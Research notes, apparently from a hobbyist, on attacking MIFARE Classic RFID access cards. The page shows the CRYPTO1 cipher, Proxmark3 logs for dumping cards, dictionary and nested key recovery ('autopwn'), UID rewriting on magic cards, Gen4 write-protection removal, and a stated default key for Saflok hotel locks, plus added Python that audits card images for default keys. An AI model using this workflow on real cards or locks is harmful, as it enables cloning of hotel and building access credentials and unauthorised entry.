MIFARE Classic

  • Uses the ISO/IEC 14443-3 protocol
  • Operates at 13.56 MHz
  • 1K or 4K EEPROM
    • Uses a key to write and a separate key to read the data block

Unsaflok is a series of serious security vulnerabilities in dormakaba’s Saflok electronic RFID locks, commonly used in hotels and multi-family housing environments.

Documentation:

CRYPTO1 Cipher

The CRYPTO1 cipher is based on a 48-bit linear feedback shift register (LFSR).

Polynomial: x^48 + x^43 + x^39 + x^38 + x^36 + x^34 + x^33 + x^31 + x^29 + x^24 + x^23 + x^21 + x^19 + x^13 + x^9 + x^7 + x^6 + x^5 + 1
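As an added example (not from the original notes), the register defined by this polynomial can be written out in Python. The mapping from exponent e to state bit 48 - e and all function names are assumptions made here; the example also goes one step beyond the page by checking that the register is linear and that each clock can be undone.

```python
# Added example: the 48-bit register defined by the polynomial above.
# Assumption (not stated on the page): exponent e maps to state bit 48 - e,
# so x^48 is bit 0 (the bit shifted out) and the "+ 1" term is the new bit.
EXPONENTS = [48, 43, 39, 38, 36, 34, 33, 31, 29, 24,
             23, 21, 19, 13, 9, 7, 6, 5, 0]
WIDTH = 48
TAPS = sorted(WIDTH - e for e in EXPONENTS if e != 0)
TAP_MASK = sum(1 << t for t in TAPS)
STATE_MASK = (1 << WIDTH) - 1


def parity(value):
    """XOR of all bits in value."""
    return bin(value).count("1") & 1


def step(state, in_bit=0):
    """Clock once: drop bit 0, insert the feedback bit at bit 47."""
    feedback = parity(state & TAP_MASK) ^ (in_bit & 1)
    return (state >> 1) | (feedback << (WIDTH - 1))


def unstep(state, in_bit=0):
    """Undo step(): only XOR and shifts are involved, so bit 0 is recoverable."""
    feedback = state >> (WIDTH - 1)
    shifted = (state << 1) & STATE_MASK  # bits 1..47 restored, bit 0 still 0
    bit0 = feedback ^ (in_bit & 1) ^ parity(shifted & TAP_MASK)
    return shifted | bit0


def run(state, bits):
    """Clock the register once per input bit and return the final state."""
    for b in bits:
        state = step(state, b)
    return state


def is_linear(a, b, clocks=96):
    """With zero input, clocking a XOR b equals clocking each and XORing."""
    zeros = [0] * clocks
    return run(a ^ b, zeros) == run(a, zeros) ^ run(b, zeros)


if __name__ == "__main__":
    s = 0x123456789ABC  # constructed 48-bit state, not a real key
    print("taps:", TAPS)
    print("undo ok:", unstep(step(s)) == s, "linear:", is_linear(s, 0x0F0F0F0F0F0F))
```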

Mifare Classic EV1

  • 48-bit Crypto-1
  • ECC signature

Proxmark Commands

Read Card:

[usb] pm3 --> hf mf info
[=] --- ISO14443-a Information ---------------------
[+] UID: 6D 5D 03 B2
[+] ATQA: 00 04
[+] SAK: 08 [2]
[=] --- Keys Information
[=] [0] key FF FF FF FF FF FF
[+] loaded 1 keys supplied by user
[+] loaded 59 keys from hardcoded default array
[+] Sector 0 key A... FFFFFFFFFFFF
[+] Sector 0 key B... FFFFFFFFFFFF
[+] Block 0.......... 6D 5D 03 B2 81 08 04 00 62 63 64 65 66 67 68 69
[+] Fudan tag detected
[=] --- Magic Tag Information
[=] <N/A>
[=] --- PRNG Information
[#] Static nonce......... 01200145
[+] Static nonce......... yes

Dump and View:

[usb] pm3 --> hf mf dump
[=] Using... hf-mf-6C2337D5-key.bin
[=] Reading sector access bits...
[=] .................
[+] Finished reading sector access bits
[=] Dumping all blocks from card...
[/]successfully read block 3 of sector 15
[+] Succeeded in dumping all blocks
[+] time: 10 seconds
[...]
[usb] pm3 --> hf mf view --file hf-mf-6C2337D5-dump-001.bin
[+] loaded 1024 bytes from binary file `hf-mf-6C2337D5-dump-001.bin`
[=] -----+-----+-------------------------------------------------+-----------------
[=]  sec | blk | data                                            | ascii
[=] -----+-----+-------------------------------------------------+-----------------
[=]    0 |   0 | 6C 23 37 D5 AD 08 04 00 03 71 31 F3 60 0A 46 1D | l#7......q1.`.F.
[=]      |   1 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
[=]      |   2 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
[=]      |   3 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......
[=]    1 |   4 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
[=]      |   5 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
[=]      |   6 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
[=]      |   7 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......
[=]    2 |   8 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
[=]      |   9 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
[=]      |  10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
[=]      |  11 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......
[=]    3 |  12 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
[=]      |  13 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
[=]      |  14 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
[=]      |  15 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......
[=]    4 |  16 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
[=]      |  17 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
[=]      |  18 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
[=]      |  19 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......
[=]    5 |  20 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
[=]      |  21 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
[=]      |  22 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
[=]      |  23 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......
[=]    6 |  24 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
[=]      |  25 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
[=]      |  26 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
[=]      |  27 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......
[=]    7 |  28 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
[=]      |  29 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
[=]      |  30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
[=]      |  31 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......
[=]    8 |  32 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
[=]      |  33 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
[=]      |  34 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
[=]      |  35 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......
[=]    9 |  36 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
[=]      |  37 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
[=]      |  38 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
[=]      |  39 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......
[=]   10 |  40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
[=]      |  41 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
[=]      |  42 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
[=]      |  43 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......
[=]   11 |  44 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
[=]      |  45 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
[=]      |  46 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
[=]      |  47 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......
[=]   12 |  48 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
[=]      |  49 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
[=]      |  50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
[=]      |  51 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......
[=]   13 |  52 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
[=]      |  53 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
[=]      |  54 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
[=]      |  55 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......
[=]   14 |  56 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
[=]      |  57 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
[=]      |  58 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
[=]      |  59 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......
[=]   15 |  60 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
[=]      |  61 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
[=]      |  62 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
[=]      |  63 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......
[=] -----+-----+-------------------------------------------------+-----------------
[?] cyan = value block with decoded value
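Every fourth block in the dump above (3, 7, 11, ...) is a sector trailer: key A, three access-bit bytes, a spare byte, and key B. The following Python is an added example, not part of the original notes or of the Proxmark client: it decodes the access bits of each trailer in a 1K image, checks their inverted copies, and flags the two well-known keys that appear in the key-search output further down this page. The function names and the sample image are constructed for the illustration.

```python
# Added example: audit sector trailers of a MIFARE Classic 1K image (1024 bytes).
WELL_KNOWN = {  # both keys appear in the key-search output on this page
    bytes.fromhex("FFFFFFFFFFFF"): "factory default key",
    bytes.fromhex("A0A1A2A3A4A5"): "public MAD key",
}
DATA_RULES = {  # (C1, C2, C3) -> (keys that may read, keys that may write) a data block
    (0, 0, 0): ("A|B", "A|B"), (0, 1, 0): ("A|B", "never"),
    (1, 0, 0): ("A|B", "B"), (1, 1, 0): ("A|B", "B"),
    (0, 0, 1): ("A|B", "never"), (0, 1, 1): ("B", "B"),
    (1, 0, 1): ("B", "never"), (1, 1, 1): ("never", "never"),
}

def decode_access_bits(ac):
    """Split trailer bytes 6..8 into (C1, C2, C3) for blocks 0..3.
    Each nibble is stored twice, once inverted; a mismatch is an error."""
    b6, b7, b8 = ac[0], ac[1], ac[2]
    c1, c2, c3 = b7 >> 4, b8 & 0x0F, b8 >> 4
    n1, n2, n3 = b6 & 0x0F, b6 >> 4, b7 & 0x0F
    if (c1 ^ n1, c2 ^ n2, c3 ^ n3) != (0xF, 0xF, 0xF):
        raise ValueError("access bits fail the inverted-copy check")
    return [((c1 >> i) & 1, (c2 >> i) & 1, (c3 >> i) & 1) for i in range(4)]

def audit(image):
    """Return {sector: [findings]} for a 1024-byte card image."""
    if len(image) != 1024:
        raise ValueError("expected a 1024-byte MIFARE Classic 1K image")
    report = {}
    for sector in range(16):
        trailer = image[sector * 64 + 48: sector * 64 + 64]
        found = [f"key {name} is the {WELL_KNOWN[key]}"
                 for name, key in (("A", trailer[:6]), ("B", trailer[10:]))
                 if key in WELL_KNOWN]
        try:
            bits = decode_access_bits(trailer[6:9])
            for blk in range(3):
                if DATA_RULES[bits[blk]][1] == "A|B":
                    found.append(f"block {blk} writable with either key")
        except ValueError as err:
            found.append(str(err))
        report[sector] = found
    return report

def sample_image():
    """Constructed input: factory-default sectors plus two variations."""
    default = bytes(48) + bytes.fromhex("FFFFFFFFFFFFFF078069FFFFFFFFFFFF")
    # Sector 1: made-up keys; 78 77 88 = read with A or B, write with B only.
    custom = bytes(48) + bytes.fromhex("11223344556678778869665544332211")
    # Sector 2: one flipped bit in byte 8 breaks the inverted-copy check.
    broken = bytes(48) + bytes.fromhex("FFFFFFFFFFFFFF078169FFFFFFFFFFFF")
    return default + custom + broken + default * 13

if __name__ == "__main__":
    for sector, found in audit(sample_image()).items():
        print(sector, found or "no findings")
```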

Mifare Application Data:

[usb] pm3 --> hf mf mad
[=] Authentication ( ok )
[#] Auth error
[=] --- MIFARE App Directory Information ----------------
[=] -----------------------------------------------------
[=] ------------ MAD v1 details -------------
[+] Card publisher sector 0x01
[=] ---------------- Listing ----------------
[=] 00 MAD v1
[=] 01 [7006] Hotel, access contr. & sec [Vingcard a.s.]
[=] 02 [7005] Energy Saving System For Hotels, Access Control [ENKOA System]
[=] 03 [7007] Hotel, access contr. & sec [Vingcard a.s.]
[=] 04 [7007] continuation
[=] 05 [7007] continuation
[=] 06 [7009] Access control data for electronic locks [Timelox AB]
[=] 07 [0000] free
[=] 08 [0000] free
[=] 09 [0000] free
[=] 10 [0000] free
[=] 11 [0000] free
[=] 12 [0000] free
[=] 13 [0000] free
[=] 14 [0000] free
[=] 15 [0000] free

Key Search:

[usb] pm3 --> hf mf fchk -f mfc_default_keys
[+] loaded 59 keys from hardcoded default array
[+] loaded 1726 keys from dictionary file D:\V0.2.8-win64\rrg_other-20240116-989ef99e4a65424f77721540eb227cb8e86403dd\client\dictionaries/mfc_default_keys.dic
[=] Running strategy 1
[=] .
[=] Running strategy 2
[=] .
[=] time in checkkeys (fast) 47.1s
[+] found keys:
[+] -----+-----+--------------+---+--------------+----
[+]  Sec | Blk | key A        |res| key B        |res
[+] -----+-----+--------------+---+--------------+----
[+]  000 | 003 | A0A1A2A3A4A5 | 1 | B578F38A5C61 | 1
[+]  001 | 007 | ------------ | 0 | ------------ | 0
[+]  002 | 011 | A0A1A2A3A4A5 | 1 | 0000014B5C31 | 1
[+]  003 | 015 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+]  004 | 019 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+]  005 | 023 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+]  006 | 027 | FFFFFFFFFFFF | 1 | ------------ | 0
[+]  007 | 031 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+]  008 | 035 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+]  009 | 039 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+]  010 | 043 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+]  011 | 047 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+]  012 | 051 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+]  013 | 055 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+]  014 | 059 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+]  015 | 063 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] -----+-----+--------------+---+--------------+----
[+] ( 0:Failed / 1:Success )
[?] MAD key detected. Try `hf mf mad` for more details

Auto Dump Keys and Data:

[usb] pm3 --> hf mf autopwn -f mfc_default_keys
[!] no known key was supplied, key recovery might fail
[+] loaded 59 keys from hardcoded default array
[+] loaded 1726 keys from dictionary file D:\V0.2.8-win64\rrg_other-20240116-989ef99e4a65424f77721540eb227cb8e86403dd\client\dictionaries/mfc_default_keys.dic
[=] running strategy 1
[=] .
[=] running strategy 2
[=] .
[+] target sector 0 key type A -- found valid key [ A0A1A2A3A4A5 ] (used for nested / hardnested attack)
[+] target sector 0 key type B -- found valid key [ B578F38A5C61 ]
[+] target sector 2 key type A -- found valid key [ A0A1A2A3A4A5 ]
[+] target sector 2 key type B -- found valid key [ 0000014B5C31 ]
[+] target sector 3 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 3 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 4 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 4 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 5 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 5 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 6 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 7 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 7 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 8 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 8 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 9 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 9 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 10 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 10 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 11 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 11 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 12 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 12 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 13 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 13 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 14 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 14 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 15 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 15 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] Found 1 key candidates
[+] Target block 4 key type A -- found valid key [ D0020E22BA10 ]
[+] target sector 1 key type A -- found valid key [ D0020E22BA10 ]
[+] Found 1 key candidates
[+] Target block 4 key type B -- found valid key [ 10083AEC46B0 ]
[+] target sector 1 key type B -- found valid key [ 10083AEC46B0 ]
[+] Found 1 key candidates
[+] Target block 24 key type B -- found valid key [ 94E6E9E0F498 ]
[+] target sector 6 key type B -- found valid key [ 94E6E9E0F498 ]
[+] found keys:
[+] -----+-----+--------------+---+--------------+----
[+]  Sec | Blk | key A        |res| key B        |res
[+] -----+-----+--------------+---+--------------+----
[+]  000 | 003 | A0A1A2A3A4A5 | D | B578F38A5C61 | D
[+]  001 | 007 | D0020E22BA10 | N | 10083AEC46B0 | N
[+]  002 | 011 | A0A1A2A3A4A5 | D | 0000014B5C31 | D
[+]  003 | 015 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+]  004 | 019 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+]  005 | 023 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+]  006 | 027 | FFFFFFFFFFFF | D | 94E6E9E0F498 | N
[+]  007 | 031 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+]  008 | 035 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+]  009 | 039 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+]  010 | 043 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+]  011 | 047 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+]  012 | 051 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+]  013 | 055 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+]  014 | 059 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+]  015 | 063 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] -----+-----+--------------+---+--------------+----
[=] ( D:Dictionary / S:darkSide / U:User / R:Reused / N:Nested / H:Hardnested / C:statiCnested / A:keyA )
[?] MAD key detected. Try `hf mf mad` for more details
[+] Generating binary key file
[+] Found keys have been dumped to D:\V0.2.8-win64\rrg_other-20240116-989ef99e4a65424f77721540eb227cb8e86403dd\client\/hf-mf-306EDAAE-key.bin
[=] --[ FFFFFFFFFFFF ]-- has been inserted for unknown keys where res is 0
[=] transferring keys to simulator memory ( ok )
[=] dumping card content to emulator memory (Cmd Error: 04 can occur)
[#] Block 8 Cmd 0x30 Cmd Error 04
[#] Error No rights reading sector 2 block 0
[#] Block 9 Cmd 0x30 Wrong response len, expected 18 got 0
[#] Block 9 Cmd 0x30 Wrong response len, expected 18 got 0
[#] Block 10 Cmd 0x30 Wrong response len, expected 18 got 0
[#] Block 10 Cmd 0x30 Wrong response len, expected 18 got 0
[#] Block 11 Cmd 0x30 Wrong response len, expected 18 got 0
[#] Block 11 Cmd 0x30 Wrong response len, expected 18 got 0
[#] Block 24 Cmd 0x30 Cmd Error 04
[#] Error No rights reading sector 6 block 0
[#] Block 25 Cmd 0x30 Wrong response len, expected 18 got 0
[#] Block 25 Cmd 0x30 Wrong response len, expected 18 got 0
[#] Block 26 Cmd 0x30 Wrong response len, expected 18 got 0
[#] Block 26 Cmd 0x30 Wrong response len, expected 18 got 0
[#] Block 27 Cmd 0x30 Wrong response len, expected 18 got 0
[#] Block 27 Cmd 0x30 Wrong response len, expected 18 got 0
[-] fast dump reported back failure w KEY A, swapping to KEY B
[=] downloading card content from emulator memory
[+] saved 1024 bytes to binary file D:\V0.2.8-win64\rrg_other-20240116-989ef99e4a65424f77721540eb227cb8e86403dd\client\/hf-mf-306EDAAE-dump.bin
[+] saved to json file D:\V0.2.8-win64\rrg_other-20240116-989ef99e4a65424f77721540eb227cb8e86403dd\client\/hf-mf-306EDAAE-dump.json
[=] autopwn execution time: 52 seconds

[usb] pm3 --> hf mf nack
[=] Checking for NACK bug
[=] ...
[+] NACK test: always leak NACK

Magic Card 7b UID

Change Block 0:

[usb] pm3 --> hf mf rdbl --blk 0
[=]   # | sector 00 / 0x00                                | ascii
[=] ----+-------------------------------------------------+-----------------
[=]   0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
[usb] pm3 --> hf mf wrbl --blk 0 -d 000102030405060708090a0b0c0d0e0f --force
[=] Writing block no 0, key A - FFFFFFFFFFFF
[=] data: 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F
[+] Write ( ok )
[?] try `hf mf rdbl` to verify
[usb] pm3 --> hf mf rdbl --blk 0
[=]   # | sector 00 / 0x00                                | ascii
[=] ----+-------------------------------------------------+-----------------
[=]   0 | 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F | ................
[usb] pm3 --> hf mf info
[=] --- ISO14443-a Information ---------------------
[+] UID: 00 01 02 03 04 05 06
[+] ATQA: 00 42
[+] SAK: 18 [2]
[=] --- Keys Information
[=] [0] key FF FF FF FF FF FF
[+] loaded 1 keys supplied by user
[+] loaded 59 keys from hardcoded default array
[+] Sector 0 key A... FFFFFFFFFFFF
[+] Sector 0 key B... FFFFFFFFFFFF
[+] Block 0.......... 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F
[=] --- Magic Tag Information
[+] Magic capabilities... Gen 2 / CUID
[=] --- PRNG Information
[#] Static nonce......... 00000000
[+] Static nonce......... yes

Magic Card 7b UID

Change Block 0:

[usb] pm3 --> hf mf rdbl --blk 0
[=]   # | sector 00 / 0x00                                | ascii
[=] ----+-------------------------------------------------+-----------------
[=]   0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
[usb] pm3 --> hf mf wrbl --blk 0 -d 000102030405060708090a0b0c0d0e0f --force
[=] Writing block no 0, key A - FFFFFFFFFFFF
[=] data: 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F
[+] Write ( ok )
[?] try `hf mf rdbl` to verify
[usb] pm3 --> hf mf rdbl --blk 0
[=]   # | sector 00 / 0x00                                | ascii
[=] ----+-------------------------------------------------+-----------------
[=]   0 | 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F | ................
[usb] pm3 --> hf mf info
[=] --- ISO14443-a Information ---------------------
[+] UID: 00 01 02 03
[+] ATQA: 00 02
[+] SAK: 18 [2]
[=] --- Keys Information
[=] [0] key FF FF FF FF FF FF
[+] loaded 1 keys supplied by user
[+] loaded 59 keys from hardcoded default array
[+] Sector 0 key A... FFFFFFFFFFFF
[+] Sector 0 key B... FFFFFFFFFFFF
[+] Block 0.......... 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F
[=] --- Magic Tag Information
[+] Magic capabilities... Gen 2 / CUID
[=] --- PRNG Information
[+] Prng................. weak

Magic Gen4 Card

How to remove the write protections on Gen4 Cards:

# Get Magic config info
hf mf gdmcfg
# turn Magic Wakeup on...
hf mf gdmsetcfg -d 7AFF00000000000000005A5A00000008
# turn Magic Wakeup off...
hf mf gdmsetcfg -d 850000000000000000005A5A00000008

Saflok Card

Uses a default key of 0x2a2c13cc242a in key_id[1].
Source

KDF Verification